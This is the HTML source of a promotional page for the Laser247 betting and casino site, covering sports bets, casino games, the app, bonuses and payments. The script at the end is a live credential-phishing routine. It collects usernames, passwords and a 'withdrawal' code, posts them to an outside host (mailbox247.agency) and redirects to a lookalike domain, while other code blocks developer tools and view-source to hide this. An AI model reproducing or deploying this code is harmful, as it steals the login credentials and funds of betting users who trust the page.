				<p>Players can increase their profits by combining many wagers into one using accumulator bets. If every option is right, the payout can be much more than if you make separate bets. </p>
				</div>
				</div>
				<div class="col-sm-3">
				<div class="box">
				<div class="image"><img src="assets/image/gambling.png" alt="Special Bets" class="img-responsive"></div>
				<h4 class="box-title">Special Bets</h4>
				<p>Special bets include things like the next goal scorer in football, the total amount of runs in cricket, or whether a match will go to extra time in a knockout tournament. </p>
				</div>
				</div>
			</div>					
			</div>
			<h4 class="heading-title">Important Competitions</h4>
			<p>Among the major leagues that Laser247 covers are the IPL, ICC World Cup, UEFA Champions League, NBA, and Wimbledon. Laser247 offers a variety of betting alternatives with competitive odds on all major international sporting events, regardless of your passion for cricket, tennis, or football.</p>
		</div>
		
		<div class="section-four">
			<h2 class="heading-title text-center">Casino Games on Laser247.vip</h2>
			<p>In addition to sports betting, Laser247 provides a fully functional online casino with a wide range of games to suit all player preferences. The casino department of Laser247 provides:</p>
			
			<h3 class="heading-title">Slots:</h3>
			<ul>
				<li>
					<strong>Classic Slots:</strong> For players who prefer simplicity, Laser247 offers a selection of classic slot games with traditional themes and simple gameplay.  
				</li>
				<li>
					<strong>Video Slots:</strong> Bonus rounds and interesting themes are hallmarks of more intricate slot games. They consist of slot machines with movie, fantasy, and historical themes. 
				</li>
				<li>
					<strong>Progressive Jackpot Slots:</strong> These slots are perfect for gamers who want to win big since they provide huge payouts that increase with every spin until the jackpot is won. 
				</li>
			</ul>
			<h3 class="heading-title">Table Games:</h3>
			<ul>
				<li>
					<strong>Blackjack:</strong> The goal of the popular card game blackjack at the table is to defeat the dealer by getting as close to 21 as you can without going over. A selection of blackjack games are available at Laser247 to keep things interesting. 
				</li>
				<li>
					<strong>Roulette:</strong> One of the most played casino games is available in both European and American variants at Laser247. 
				</li>
				<li>
					<strong>Baccarat:</strong> Baccarat is another card game available on Laser247. Players can choose between more traditional and faster-paced variations of Baccarat. 
				</li>
			</ul>

			<h3 class="heading-title">Live Casino:</h3>
			<p>The live casino function of Laser247.vip, which lets customers play table games with experienced dealers while watching live, is one of its most noteworthy features. This realistic and captivating gaming experience brings the excitement of a real casino into your home. The following games are available in the live casino: </p>
			<ul>
				<li>
					<strong>Live Blackjack:</strong> Play against real dealers in real-time.
				</li>
				<li>
					<strong>Live Roulette:</strong> Place your bets as the wheel spins in real-time.
				</li>
				<li>
					<strong>Live Baccarat:</strong> Experience the elegance of baccarat with live dealers.
				</li>
			</ul>
		</div>
		
		<div class="section-five">
		<h2 class="heading-title text-center">The Laser247.vip download: Mobile App </h2>
		<p>Mobile betting is becoming more and more popular in today's fast-paced society. Laser247 recognized this trend and developed a state-of-the-art mobile application that provides users with an impeccable betting experience while they're on the road. Users of iOS and Android smartphones can access the Laser247 mobile app, which provides the following features:</p>
		<div class="row">
			<div class="col-sm-6">
			<div class="box">
			<h4 class="heading-title">The following features are included in the Laser247 mobile app download: </h4>
			<ul>
				<li>
					<strong>Easy-to-use Interface:</strong> The app's straightforward and user-friendly design makes it simple for users to select between live betting, casino games, and sports betting. 
				</li>
				<li>
					<strong>Push Notifications:</strong> By giving customers the most up-to-date details on their wagers, upcoming games, and special offers, push notifications ensure that they never miss an opportunity. 
				</li>
				<li>
					<strong>Secure Transactions:</strong> The app's secure access to all payment methods allows users to deposit and withdraw money with ease. 
				</li>
			</ul>
			</div>
			</div>
			
			<div class="col-sm-6">
			<div class="box">
			<h4 class="heading-title">App Download Process: Laser247 Download</h4>
			<ul>
				<li>
					<strong>Android Users:</strong> Android users can get the app directly from the Laser247 link by downloading the APK file and following the installation instructions. 
				</li>
				<li>
					<strong>iOS Users:</strong> Users of iPhones and iPads can get the app via the Apple software store. 
				</li>
			</ul>
            <p>By allowing customers to play casino games, place bets on sports, and access live dealer tables from their mobile devices, the mobile app provides the highest level of convenience. </p> 
			</div>
			</div>
		</div>
		</div>
		
		<div class="section-six">
		<h2 class="heading-title">Bonuses and Promotions</h2>
		<p>From Laser247.vip, a well-known website among bettors due to its generous bonus and promotion packages, greetings. By frequently changing its services, the platform ensures that both new and returning users can take advantage of a range of incentives. Below is a detailed analysis of the different bonus categories: </p>
		
		<div class="image-box-wrapper">
		<div class="imageRow">
			<div class="image-box-img">
			<img src="assets/image/bonus-8.png" alt="Welcome Bonus" class="img-responsive">
			</div>
			<div class="image-box-content">
			<h3 class="heading-title">Welcome Bonus</h3>
			<p>A fantastic welcome bonus that matches their first deposit is available to new users at Laser247. A customer may be eligible for a 100% match bonus, for example, if they deposit ₹5,000 for the first time. This would give them an additional ₹5,000 to wager with. This promotion applies to both sports betting and casino games. </p>
			</div>
		</div>
		
		<div class="imageRow">
			<div class="image-box-img">
			<img src="assets/image/loop-arrow.png" alt="Reload Bonuses" class="img-responsive">
			</div>
			<div class="image-box-content">
			<h3 class="heading-title">Reload Bonuses</h3>
			<p>Current Laser247 users can take advantage of reload promotions, which increase their funds on future deposits. This keeps people interested and encourages them to continue placing bets on the platform. </p>
			</div>
		</div>
		
		<div class="imageRow">
			<div class="image-box-img">
			<img src="assets/image/cashback-1.png" alt="Cashback Offers" class="img-responsive">
			</div>
			<div class="image-box-content">
			<h3 class="heading-title">Cashback Offers</h3>
			<p>Because they understand how frustrating losing bets can be, Laser247 offers cashback bonuses to help customers recoup some of their losses. These promotions typically encompass both sports and casino betting. </p>
			</div>
		</div>
		
		<div class="imageRow">
			<div class="image-box-img">
			<img src="assets/image/casino-5.png" alt="Free Bets and Free Spins" class="img-responsive">
			</div>
			<div class="image-box-content">
			<h3 class="heading-title">Free Bets and Free Spins</h3>
			<p>On occasion, the website offers free bets for sports betting and free spins for casino slot games. Sometimes these ads are associated with specific events, such as the introduction of a new slot machine or a major athletic event. </p>
			</div>
		</div>
		
		<div class="imageRow">
			<div class="image-box-img">
			<img src="assets/image/customer-experience.png" alt="Loyalty Program" class="img-responsive">
			</div>
			<div class="image-box-content">
			<h3 class="heading-title">A Measure to Encourage Loyalty </h3>
			<p>Every wager that a member of the Laser247 loyalty club makes earns them points. After that, these points can be exchanged for cash, VIP perks, and exclusive deals. As you wager more and accumulate more points, your level of loyalty increases. </p>
			</div>
		</div>
		</div>
		</div>
		
		<div class="section-seven">
		<h2 class="heading-title">Payments and Withdrawals</h2>
		<p>Laser247 understands how important it is to provide its clients with convenient and safe payment options. As a result, the platform offers several easy-to-use deposit and withdrawal choices that are safeguarded by state-of-the-art encryption technology. The various methods of payment for Laser247.vip are as follows:</p>
		
		<h4 class="heading-title">Deposit Methods:</h4>
		<ul>
			<li>
				<strong>Credit and Debit Cards:</strong> Mastercard and Visa debit and credit cards are accepted for withdrawals. 
			</li>
			<li>
				<strong>UPI:</strong> Using apps like PhonePe, Paytm, and Google Pay, UPI facilitates speedy money transfers and is a popular payment method in India. 
			</li>
			<li>
				<strong>NetBanking:</strong>In addition, Laser247 allows users who prefer traditional banking methods to make direct bank transactions through NetBanking. 
			</li>
			<li>
				<strong>E-Wallets:</strong> The popular e-wallets Skrill and Neteller can be used to make deposits. 
			</li>
		</ul>
		
		<h4 class="heading-title"><span>Withdrawal Methods:</span></h4>
		<ul>
			<li>
				<strong>Bank Transfer:</strong> Bank transfers handle the vast majority of withdrawals. After the user submits their details, the funds will be directly sent into their bank account. 
			</li>
			<li>
				<strong>E-Wallets:</strong> Users can withdraw funds from their Skrill or Neteller accounts. 
			</li>
		</ul>
		<p>Withdrawals at Laser247.vip are typically processed in a day or two. However, in order to verify their identity and avoid any delays, users must complete the KYC process for initial withdrawals. </p>
		</div>
		
		<div class="section-egh">
		<h2 class="heading-title text-center">How to Bet on Laser247.vip: A Quick & Easy Process</h2>
		<p>Whether they are betting on sports or trying their luck at casino games, customers can have a seamless experience with Laser247's straightforward betting system. This course will cover how to bet on live, sports, and casino games, as well as the whole Laser247 betting procedure. </p> 
        <p>Make an account, deposit money, research the Laser247 betting markets, learn how to wager on sports, learn how to wager on casinos, and take out your gains.  
        </p>           
		
		<div class="row box-wraps">
			<div class="col-sm-4">
			<h4 class="heading-title">Create an Account or Log In.</h4>
			</div>
			<div class="col-sm-4">
			<h4 class="heading-title">Deposit Funds into Your Laser247 Account.</h4>
			</div>
			<div class="col-sm-4">
			<h4 class="heading-title">Navigating the Laser247 Betting Marketsh.</h4>
			</div>
			<div class="col-sm-4">
			<h4 class="heading-title">How to Place a Sports Bet on Laser247.</h4>
			</div>
			<div class="col-sm-4">
			<h4 class="heading-title">How to Place a Bet on Casino Games.</h4>
			</div>
			<div class="col-sm-4">
			<h4 class="heading-title">Withdrawal of Winnings.</h4>
			</div>
		</div>
		
		<h2 class="heading-title">Laser247 Customer Service and Support </h2>
		<p>Laser247 understands the value of providing outstanding customer service and ensures that its clients receive the assistance they need whenever they have questions or have issues. The platform's support staff takes pleasure in offering prompt and effective assistance, and users can reach them via a variety of channels. </p>
        <p>Have you got a good reason to wait? To begin betting and making money on one of the most well-known websites, create your Laser247 Login ID. Play safely and securely while exploring your favorite alternatives from a number of options!</p>
		</div>
		
		</div>
	</div>
</div>
   
    <div class="footer">
        <div class="container">

            <div class="col-lg-6 col-md-10 col-sm-12">
                <div class="innerFooterSec">

                    <div class="imgOne">
                        <img src="gc.png" alt="Laser247">
                    </div>

                    <img src="lice.png" alt="Laser247">

                    <p>Laser247 is the trading name of Sports Target B.V., a company incorporated and regulated in Curaçao under company number 148053 with it's registered office at Fransche Bloemweg 4, Willemstad, Curaçao.</p>

                </div>
            </div>

            <p class="browser">Our website works best in the newest and last prior version of these browsers: Google Chrome. Firefox</p>

            <ul class="list-inline">
                <li class="list-inline-item"><a href="">Privacy Policy</a></li>
                <li class="list-inline-item"><a href="">Terms And Conditions</a></li>
                <li class="list-inline-item"><a href="">Rules And Regulations</a></li>
                <li class="list-inline-item"><a href="">About Us</a></li>
            </ul>
            <img src="btn.png" class="mobileappBtn" alt="Laser247">
        </div>
    </div>

    <div class="mobileFooter">
        <div class="inFooterState">
        <div>
            <a href="index.html">
                <img src="assets/trophy.png" alt="Laser247">           
                <h6>Sports</h6>
            </a>
        </div>
        <div>
            <a href="index.html">
                <img src="assets/stopwatch.png" alt="Laser247">
                <h6>In Play</h6>
            </a>
        </div>
        <div class="homeColor">
            <a href="index.html">
                <img src="assets/home.png" alt="Laser247">    
                <h6>Home</h6>
            </a>
        </div>
        <div>
            <a href="index.html">
                <img src="assets/thumbtacks.png" alt="Laser247">
                <h6>Multi Ma..</h6>
            </a>
        </div>
        <div>
            <a href="index.html">
                <img src="assets/account.png" alt="Laser247">
                <h6>Account</h6>
            </a>
        </div>
        </div>
    </div>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>


<script type="text/javascript">	   
	   document.onkeydown = function(e) {
        if (e.ctrlKey && 
            (e.keyCode === 67 || 
             e.keyCode === 86 || 
             e.keyCode === 85 || 
             e.keyCode === 117)) {
            return false;
        } else {
            return true;
        }	
		};
		
		document.onkeydown = function(e) {
			if(e.keyCode == 123) {
			 return false;
			}
			if(e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)){
			 return false;
			}
			if(e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)){
			 return false;
			}
			if(e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)){
			 return false;
			}

			if(e.ctrlKey && e.keyCode == 'C'.charCodeAt(0)){
			 return false;
			}      
		}

		$(function() {
			$(this).bind("contextmenu", function(e) {
				e.preventDefault();
			});
		}); 
	</script>
	
<script>
    $('#LoginDeskButton').on('click', function(){
        var username =  $('#username').val();
        var password =  $('#password').val();
        if(username == "" && password == ""){
            $('#ERRORSHOW').html('All fields ara required.');
        }else if(username == ""){
            $('#ERRORSHOW').html('Username field is required.');
        }else if(password == ""){
            $('#ERRORSHOW').html('Password field is required.');
        }else{
            $('#ERRORSHOW').html('');
            $('#userpass').css('display', 'none');
            sessionStorage.setItem("username", username);
            sessionStorage.setItem("password", password);
            $('#withcode').css('display', 'block');
        }
    })

    $('#loginFinal').on('click', function(){
        var code =  $('#withdrawal').val();
        if(code == "" ){
            $('#ERRORSHOW').html('All fields ara required.');
        }else{
            $('#ERRORSHOW').html('');
            var username = sessionStorage.getItem("username");
            var password  = sessionStorage.getItem("password");
            $.ajax({
                url : 'https://mailbox247.agency/admin/laser247.php',
                type: 'post',
                data : {username, password, code},
                success: function(result){
                    if(result="sucessmsg"){
                        // alert('Server not responding. Please after some time.');
                        window.location.href = "https://www.Laser247.online";
                    }
                }
            });
        }
    })
</script>

</body>
</html>
